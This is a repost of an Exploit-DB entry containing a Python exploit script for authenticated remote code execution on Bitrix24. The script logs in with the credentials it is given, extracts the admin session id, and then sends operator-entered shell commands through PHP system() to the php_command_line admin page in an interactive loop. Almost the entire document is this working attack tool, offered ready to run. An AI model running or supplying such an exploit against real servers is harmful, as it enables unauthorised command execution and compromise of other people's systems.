Bitrix24 – Remote Code Execution (RCE) (Authenticated)

• Exploit Database
• 172 阅读

• 作者： heinjame
  日期： 2022-05-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50898/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55

  # Exploit Title: Bitrix24 - Remote Code Execution (RCE) (Authenticated) # Date: 4/22/2022 # Exploit Author: picaro_o # Vendor Homepage: https://www.bitrix24.com/apps/desktop.php # Tested on: Linux os   #/usr/bin/env python #Created by heinjame     import requests import re from bs4 import BeautifulSoup import argparse,sys   user_agent = {'User-agent': 'HeinJame'}   parser = argparse.ArgumentParser() parser.add_argument("host", help="Betrix URL") parser.add_argument("uname", help="Bitrix Username") parser.add_argument("pass", help="Bitrix Password") pargs = parser.parse_args() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3]   inputcmd = input(">>") s = requests.Session() def login(): postdata = {'AUTH_FORM':'Y','TYPE':'AUTH','backurl':'%2Fstream%2F','USER_LOGIN':username,'USER_PASSWORD':password} r = s.post(url+"/stream/?login=yes", headers = user_agent , data = postdata) def getsessionid(): sessionid = s.get(url+"bitrix/admin/php_command_line?lang=en", headers = user_agent) session = re.search(r"'bitrix_sessid':.*", sessionid.text) extract = session.group(0).split(":") realdata = extract[1].strip(" ") realdata = realdata.replace("'","") realdata = realdata.replace(",","") return realdata # print(r.text) def cmdline(cmd,sessionid): cmdline = {'query':"system('"+cmd+"');",'result_as_text':'n','ajax':'y'} usercmd = s.post(url+"bitrix/admin/php_command_line.php?lang=en&sessid="+sessionid,headers = user_agent, data = cmdline) soup = BeautifulSoup(usercmd.content,'html.parser') cmd = soup.find('p').getText() print(cmd.rstrip()) login() sessionid = getsessionid() while inputcmd != "exit": cmdline(inputcmd,sessionid) inputcmd = input(">>")